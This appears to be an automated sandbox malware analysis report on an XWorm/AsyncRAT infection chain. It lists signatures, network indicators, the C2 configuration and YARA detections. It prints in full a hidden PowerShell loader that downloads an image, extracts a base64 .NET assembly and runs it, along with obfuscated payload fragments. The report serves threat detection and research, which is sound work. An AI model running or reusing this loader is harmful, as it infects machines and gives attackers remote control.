eDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgT

            Data Obfuscation

            barindex
            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820', 'https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.irpawx/rorre/moc.seporrehtnap//:sptth' , '1' , 'C:\ProgramData\' , 'Name_File','RegAsm',''))} }",
            Timestamp:04/23/24-07:55:20.064498
            SID:2852870
            Source Port:8450
            Destination Port:49735
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/23/24-07:53:58.364581
            SID:2855924
            Source Port:49735
            Destination Port:8450
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/23/24-07:55:20.064498
            SID:2852874
            Source Port:8450
            Destination Port:49735
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/23/24-07:55:10.823355
            SID:2853193
            Source Port:49735
            Destination Port:8450
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:04/23/24-07:53:35.875260
            SID:2020423
            Source Port:443
            Destination Port:49732
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://pesterbdd.com/images/Pester.pngURL Reputation: Label: malware
            Source: 00000007.00000002.3520703529.0000000002C01000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["aprilxrwonew8450.duckdns.org"], "Port": "8450", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
            Source: uploaddeimagens.com.brVirustotal: Detection: 6%Perma Link
            Source: https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820Virustotal: Detection: 13%Perma Link
            Source: 7.2.RegAsm.exe.400000.0.unpackString decryptor: aprilxrwonew8450.duckdns.org
            Source: 7.2.RegAsm.exe.400000.0.unpackString decryptor: 8450
            Source: 7.2.RegAsm.exe.400000.0.unpackString decryptor: <123456789>
            Source: 7.2.RegAsm.exe.400000.0.unpackString decryptor: <Xwormmm>
            Source: 7.2.RegAsm.exe.400000.0.unpackString decryptor: USB.exe
            Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.5:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.5:49729 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 116.206.104.215:443 -> 192.168.2.5:49732 version: TLS 1.2

            Software Vulnerabilities

            barindex
            Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

            Networking

            barindex
            Source: TrafficSnort IDS: 2020423 ET CURRENT_EVENTS Unknown EK Landing Feb 16 2015 b64 1 M1 116.206.104.215:443 -> 192.168.2.5:49732
            Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 134.255.217.251:8450 -> 192.168.2.5:49735
            Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 134.255.217.251:8450 -> 192.168.2.5:49735
            Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.5:49735 -> 134.255.217.251:8450
            Source: TrafficSnort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.5:49735 -> 134.255.217.251:8450
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 172.67.187.200 443Jump to behavior
            Source: Malware configuration extractorURLs: aprilxrwonew8450.duckdns.org
            Source: unknownDNS query: name: paste.ee
            Source: unknownDNS query: name: aprilxrwonew8450.duckdns.org
            Source: global trafficTCP traffic: 192.168.2.5:49735 -> 134.255.217.251:8450
            Source: global trafficHTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.br
            Source: global trafficHTTP traffic detected: GET /error/xwapri.txt HTTP/1.1Host: pantherropes.comConnection: Keep-Alive
            Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
            Source: Joe Sandbox ViewIP Address: 172.67.187.200 172.67.187.200
            Source: Joe Sandbox ViewIP Address: 172.67.215.45 172.67.215.45
            Source: Joe Sandbox ViewASN Name: ACTIVE-SERVERSactive-serverscomDE ACTIVE-SERVERSactive-serverscomDE
            Source: Joe Sandbox ViewASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: global trafficHTTP traffic detected: GET /d/FIwXa HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /d/FIwXa HTTP/1.1Accept: */*Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: paste.eeConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.brConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /images/004/771/542/original/new_image.jpg?1713394820 HTTP/1.1Host: uploaddeimagens.com.br
            Source: global trafficHTTP traffic detected: GET /error/xwapri.txt HTTP/1.1Host: pantherropes.comConnection: Keep-Alive
            Source: unknownDNS traffic detected: queries for: paste.ee
            Source: powershell.exe, 00000005.00000002.2353488546.000001C1BDC2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2333958982.000001C1AF55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000005.00000002.2333958982.000001C1ADDDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000002.00000002.2921006320.000002209C91A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2333958982.000001C1ADBB1000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000007.00000002.3520703529.0000000002C01000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000005.00000002.2333958982.000001C1AF03C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000005.00000002.2333958982.000001C1ADDDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: powershell.exe, 00000002.00000002.2921006320.000002209C8CE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
            Source: powershell.exe, 00000002.00000002.2921006320.000002209C906000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2910379828.000002793BDE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2333958982.000001C1ADBB1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
            Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
            Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
            Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
            Source: powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
            Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
            Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
            Source: powershell.exe, 00000005.00000002.2333958982.000001C1ADDDC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
            Source: wscript.exe, 00000000.00000003.2226569396.000002CC1EA0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lesferch.github.io/DesktopPic
            Source: wscript.exe, 00000000.00000003.2235638255.000002CC1EC5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232630314.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236999970.000002CC1EC5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
            Source: powershell.exe, 00000005.00000002.2353488546.000001C1BDC2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2333958982.000001C1AF55C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2353488546.000001C1BDD64000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
            Source: powershell.exe, 00000005.00000002.2333958982.000001C1AF03C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
            Source: powershell.exe, 00000005.00000002.2333958982.000001C1AF03C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
            Source: wscript.exe, 00000000.00000003.2233340297.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232630314.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
            Source: wscript.exe, 00000000.00000003.2235743544.000002CC1EA0D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232406242.000002CC1E9B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2235638255.000002CC1EC5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232630314.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233073926.000002CC1CC2E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236893994.000002CC1EC19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236999970.000002CC1EC5E000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232406242.000002CC1EA0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232885652.000002CC1EC11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232905254.000002CC1EC18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236434189.000002CC1CC34000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233299190.000002CC1EC19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233745693.000002CC1CC33000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232960454.000002CC1EA0A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2226569396.000002CC1EA0A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/FIwXa
            Source: wscript.exe, 00000000.00000002.2236893994.000002CC1EC19000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232885652.000002CC1EC11000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232905254.000002CC1EC18000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233299190.000002CC1EC19000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/FIwXaU
            Source: wscript.exe, 00000000.00000003.2235638255.000002CC1EC5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2232630314.000002CC1EC50000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236999970.000002CC1EC5E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/FIwXaok
            Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
            Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
            Source: powershell.exe, 00000004.00000002.2904251740.0000027939F0D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://uploaddeimagens.com.br/images/004/771/542/original/new_image.jpg?1713394820
            Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
            Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236247073.000002CC1CB88000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
            Source: wscript.exe, 00000000.00000003.2232630314.000002CC1EC1F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2234289094.000002CC1EC05000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.2236937839.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.2233340297.000002CC1EC24000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownHTTPS traffic detected: 172.67.187.200:443 -> 192.168.2.5:49728 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 172.67.215.45:443 -> 192.168.2.5:49729 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 116.206.104.215:443 -> 192.168.2.5:49732 version: TLS 1.2

            System Summary

            barindex
            Source: 7.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000007.00000002.3504238257.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: Process Memory Space: powershell.exe PID: 6528, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8834
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 8834Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
            Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMQDgTrevDgTreDUDgTreNDgTreDgTreyDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreMwDgTre5DgTreDQDgTreODgTreDgTreyDgTreDDgTreDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevD